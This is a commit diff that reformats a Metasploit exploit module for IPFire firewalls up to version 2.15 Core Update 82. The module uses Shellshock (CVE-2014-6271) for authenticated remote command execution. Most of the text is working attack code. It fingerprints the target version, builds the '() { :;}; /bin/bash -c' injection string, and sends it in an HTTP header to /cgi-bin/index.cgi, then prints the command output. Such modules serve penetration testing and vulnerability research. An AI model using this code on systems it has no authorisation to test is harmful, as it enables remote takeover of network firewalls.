Suggested updates for style and clarity

bug/bundler_fix
Brendan Watters 2016-06-03 14:04:58 -05:00
parent 9b5e3010ef
commit d7cd10f586
1 changed files with 57 additions and 58 deletions

View File

@ -6,73 +6,75 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'IPFire Bash Environment Variable Injection (Shellshock)',
'Description' => %q{
IPFire, a free linux based open source firewall distribution,
version <= 2.15 Update Core 82 contains an authenticated remote
command execution vulnerability via shellshock in the request headers.
},
'Author' =>
[
'h00die <mike@stcyrsecurity.com>', # module
'Claudio Viviani' # discovery
],
'References' =>
[
[ 'URL', 'https://www.exploit-db.com/exploits/34839/' ],
[ 'CVE', '2014-6271']
],
'License' => MSF_LICENSE,
'Platform' => %w{ linux unix },
'Privileged' => false,
'DefaultOptions' =>
{
'SSL' => true,
'PAYLOAD' => 'cmd/unix/generic'
},
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic'
}
},
'Targets' =>
[
[ 'Automatic Target', { }]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 29 2014'
))
super(
update_info(
info,
'Name' => 'IPFire Bash Environment Variable Injection (Shellshock)',
'Description' => %q(
IPFire, a free linux based open source firewall distribution,
version <= 2.15 Update Core 82 contains an authenticated remote
command execution vulnerability via shellshock in the request headers.
),
'Author' =>
[
'h00die <mike@stcyrsecurity.com>', # module
'Claudio Viviani' # discovery
],
'References' =>
[
[ 'URL', 'https://www.exploit-db.com/exploits/34839/' ],
[ 'CVE', '2014-6271']
],
'License' => MSF_LICENSE,
'Platform' => %w( linux unix ),
'Privileged' => false,
'DefaultOptions' =>
{
'SSL' => true,
'PAYLOAD' => 'cmd/unix/generic'
},
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic'
}
},
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 29 2014'
)
)
register_options(
[
OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
OptString.new('PASSWORD', [ false, 'Password to login with', '']),
Opt::RPORT(444)
], self.class)
], self.class
)
end
def check()
def check
begin
res = send_request_cgi({
res = send_request_cgi(
'uri' => '/cgi-bin/index.cgi',
'method' => 'GET',
'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD']),
})
'method' => 'GET'
)
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code == 401
/\<strong\>IPFire (?<version>[\d.]{4}) \([\w]+\) - Core Update (?<update>[\d]+)/ =~ res.body
if version && update && version == "2.15" && update.to_i < 83
Exploit::CheckCode::Vulnerable
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
@ -88,23 +90,20 @@ class MetasploitModule < Msf::Exploit::Remote
%{() { :;}; /bin/bash -c "#{cmd}" }
end
def exploit()
def exploit
begin
payload = cve_2014_6271(datastore['CMD'])
vprint_status("Exploiting with payload: #{payload}" )
res = send_request_cgi({
vprint_status("Exploiting with payload: #{payload}")
res = send_request_cgi(
'uri' => '/cgi-bin/index.cgi',
'method' => 'GET',
'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD']),
'headers' => {'VULN' => payload}
})
'headers' => { 'VULN' => payload }
)
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code == 401
/<li>Device: \/dev\/(?<output>.+) reports/m =~ res.body
if output
print_good(output)
end
print_good(output) unless output.nil?
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")